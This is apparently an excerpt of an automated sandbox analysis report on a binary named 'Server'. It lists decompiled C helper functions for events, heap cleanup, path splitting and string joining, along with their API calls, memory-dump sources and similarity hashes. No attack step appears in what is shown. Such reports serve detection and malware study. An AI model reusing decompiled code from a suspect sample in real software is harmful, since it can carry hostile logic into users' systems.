            • GetCurrentProcessId.KERNEL32(?,01FC1C63), ref: 01FC2009
            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01FC1C63), ref: 01FC2022
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: e7670e7005d536471b3060dcf2f6b7c2d11700cd52a78e0e4125093b4f413cf4
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: B7F069B0981302DBE7508F7CBF09B553F65E785B52F00003AE645EA1E8D7B18982DB5C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02027843(void* __esi) {
            				struct _SECURITY_ATTRIBUTES* _v4;
            				void* _t8;
            				void* _t10;
            
            				_v4 = 0;
            				memset(__esi, 0, 0x38);
            				_t8 = CreateEventA(0, 1, 0, 0);
            				 *(__esi + 0x1c) = _t8;
            				if(_t8 != 0) {
            					_t10 = CreateEventA(0, 1, 1, 0);
            					 *(__esi + 0x20) = _t10;
            					if(_t10 == 0) {
            						CloseHandle( *(__esi + 0x1c));
            					} else {
            						_v4 = 1;
            					}
            				}
            				return _v4;
            			}

            Addresses (column detached from the C-code listing): 0x0202784d to 0x02027893

            APIs
            • memset.NTDLL ref: 02027851
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,746981D0,00000000,00000000), ref: 02027866
            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02027873
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02023F34,00000000,?), ref: 02027885
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CreateEvent$CloseHandlememset
            • String ID:
            • API String ID: 2812548120-0
            • Opcode ID: 59e650e8cf3b3a2c391cfc995c0588ef3ef85b78dca65ff0cb4b832a8d8af89f
            • Instruction ID: 6ea09701cd864fd738a71a4b490cae87a684e6d39029924dfd20a77b66b14d0b
            • Opcode Fuzzy Hash: 59e650e8cf3b3a2c391cfc995c0588ef3ef85b78dca65ff0cb4b832a8d8af89f
            • Instruction Fuzzy Hash: 8BF03AB154431C6FD3206F669CC482BFBECEB8119CB224D2EB14292521C675A8189A61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02023230() {
            				void* _t1;
            				intOrPtr _t5;
            				void* _t6;
            				void* _t7;
            				void* _t11;
            
            				_t1 =  *0x202a30c; // 0x1b4
            				if(_t1 == 0) {
            					L8:
            					return 0;
            				}
            				SetEvent(_t1);
            				_t11 = 0x7fffffff;
            				while(1) {
            					SleepEx(0x64, 1);
            					_t5 =  *0x202a35c; // 0x0
            					if(_t5 == 0) {
            						break;
            					}
            					_t11 = _t11 - 0x64;
            					if(_t11 > 0) {
            						continue;
            					}
            					break;
            				}
            				_t6 =  *0x202a30c; // 0x1b4
            				if(_t6 != 0) {
            					CloseHandle(_t6);
            				}
            				_t7 =  *0x202a2d8; // 0x28b0000
            				if(_t7 != 0) {
            					HeapDestroy(_t7);
            				}
            				goto L8;
            			}

            Addresses (column detached from the C-code listing): 0x02023230 to 0x02023283

            APIs
            • SetEvent.KERNEL32(000001B4,00000001,0202109A), ref: 0202323B
            • SleepEx.KERNEL32(00000064,00000001), ref: 0202324A
            • CloseHandle.KERNEL32(000001B4), ref: 0202326B
            • HeapDestroy.KERNEL32(028B0000), ref: 0202327B
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CloseDestroyEventHandleHeapSleep
            • String ID:
            • API String ID: 4109453060-0
            • Opcode ID: d44276bb748ceed3668ddca5a6a5558599e97633aece276bffb9eb9c9d90e723
            • Instruction ID: 8cd04bc9480aa80cc2c24bfb6760dfdb430121083582a51d6fa7833dc61cc957
            • Opcode Fuzzy Hash: d44276bb748ceed3668ddca5a6a5558599e97633aece276bffb9eb9c9d90e723
            • Instruction Fuzzy Hash: 7EF03075F803659BDB715B3999C8A4237DCBB04761B360952BD04E32C0DF2CD46DA960
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E02022058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
            				intOrPtr* _v8;
            				void* _t17;
            				intOrPtr* _t22;
            				void* _t27;
            				char* _t30;
            				void* _t33;
            				void* _t34;
            				void* _t36;
            				void* _t37;
            				void* _t39;
            				int _t42;
            
            				_t17 = __eax;
            				_t37 = 0;
            				__imp__(_a4, _t33, _t36, _t27, __ecx);
            				_t2 = _t17 + 1; // 0x1
            				_t28 = _t2;
            				_t34 = E020233DC(_t2);
            				if(_t34 != 0) {
            					_t30 = E020233DC(_t28);
            					if(_t30 == 0) {
            						E020261DA(_t34);
            					} else {
            						_t39 = _a4;
            						_t22 = E02027AE9(_t39);
            						_v8 = _t22;
            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
            							_a4 = _t39;
            						} else {
            							_t26 = _t22 + 2;
            							_a4 = _t22 + 2;
            							_t22 = E02027AE9(_t26);
            							_v8 = _t22;
            						}
            						if(_t22 == 0) {
            							__imp__(_t34, _a4);
            							 *_t30 = 0x2f;
            							 *((char*)(_t30 + 1)) = 0;
            						} else {
            							_t42 = _t22 - _a4;
            							memcpy(_t34, _a4, _t42);
            							 *((char*)(_t34 + _t42)) = 0;
            							__imp__(_t30, _v8);
            						}
            						 *_a8 = _t34;
            						_t37 = 1;
            						 *_a12 = _t30;
            					}
            				}
            				return _t37;
            			}

            Addresses (column detached from the C-code listing): 0x02022058 to 0x02022106

            APIs
            • lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,020251F7,?,?,?,?,00000102,020221E7,?,?,746981D0), ref: 02022064
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
              • Part of subcall function 02027AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02022092,00000000,00000001,00000001,?,?,020251F7,?,?,?,?,00000102), ref: 02027AF7
              • Part of subcall function 02027AE9: StrChrA.SHLWAPI(?,0000003F,?,?,020251F7,?,?,?,?,00000102,020221E7,?,?,746981D0,00000000), ref: 02027B01
            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,020251F7,?,?,?,?,00000102,020221E7,?), ref: 020220C2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 020220D2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 020220DE
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
            • String ID:
            • API String ID: 3767559652-0
            • Opcode ID: d1722f477506aefda9261d5bde0fc2016d865f9c868c5b2172b0e37f96d3d0ed
            • Instruction ID: 795bf19893f18e01a922130d8e0b18cc4e3bcf6cc04481057317ec6943e51b4d
            • Opcode Fuzzy Hash: d1722f477506aefda9261d5bde0fc2016d865f9c868c5b2172b0e37f96d3d0ed
            • Instruction Fuzzy Hash: C221F331500339EFCB125FA4CC84A9EBFF9AF05354B154052FC049B201D735DA48EBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02025DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
            				void* _v8;
            				void* _t18;
            				int _t25;
            				int _t29;
            				int _t34;
            
            				_t29 = lstrlenW(_a4);
            				_t25 = lstrlenW(_a8);
            				_t18 = E020233DC(_t25 + _t29 + _t25 + _t29 + 2);
            				_v8 = _t18;
            				if(_t18 != 0) {
            					_t34 = _t29 + _t29;
            					memcpy(_t18, _a4, _t34);
            					_t10 = _t25 + 2; // 0x2
            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
            				}
            				return _v8;
            			}

            Addresses (column detached from the C-code listing): 0x02025df9 to 0x02025e3d

            APIs
            • lstrlenW.KERNEL32(004F0053,?,74655520,00000008,02CA9270,?,020252D0,004F0053,02CA9270,?,?,?,?,?,?,020268B6), ref: 02025DF4
            • lstrlenW.KERNEL32(020252D0,?,020252D0,004F0053,02CA9270,?,?,?,?,?,?,020268B6), ref: 02025DFB
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • memcpy.NTDLL(00000000,004F0053,746569A0,?,?,020252D0,004F0053,02CA9270,?,?,?,?,?,?,020268B6), ref: 02025E1B
            • memcpy.NTDLL(746569A0,020252D0,00000002,00000000,004F0053,746569A0,?,?,020252D0,004F0053,02CA9270), ref: 02025E2E
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrlenmemcpy$AllocateHeap
            • String ID:
            • API String ID: 2411391700-0
            • Opcode ID: 67091f61ebb5fe8e225fba4dc8dab482acb446f56d6d57debf793ca9eff757d0
            • Instruction ID: 4b5d6c8c20d3ec7be9a91f60ff305fabe10d25eda92d9b61248e5ce89a667afc
            • Opcode Fuzzy Hash: 67091f61ebb5fe8e225fba4dc8dab482acb446f56d6d57debf793ca9eff757d0
            • Instruction Fuzzy Hash: 71F03772900229BB8F15AFA8CC84CDE7BADEF083547514063A90897201EA35EA189BA4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlen.KERNEL32(02CA9C10,00000000,00000000,00000000,02023EF9,00000000), ref: 02027573
            • lstrlen.KERNEL32(?), ref: 0202757B
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • lstrcpy.KERNEL32(00000000,02CA9C10), ref: 0202758F
            • lstrcat.KERNEL32(00000000,?), ref: 0202759A
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
            • String ID:
            • API String ID: 74227042-0
            • Opcode ID: 9616515cc19cd15d940aeb029b19335278ea60b04b42398b7e055df1211f864f
            • Instruction ID: 5f9024759f50c5e6f1957c664a803a66eddbc2c2b2ae40f5fc2dced882103e87
            • Opcode Fuzzy Hash: 9616515cc19cd15d940aeb029b19335278ea60b04b42398b7e055df1211f864f
            • Instruction Fuzzy Hash: 6AE09B739017385F87215BE49C88C5FF7ADFF896507150817F600D3100C7799919DBA5
            Uniqueness

            Uniqueness Score: -1.00%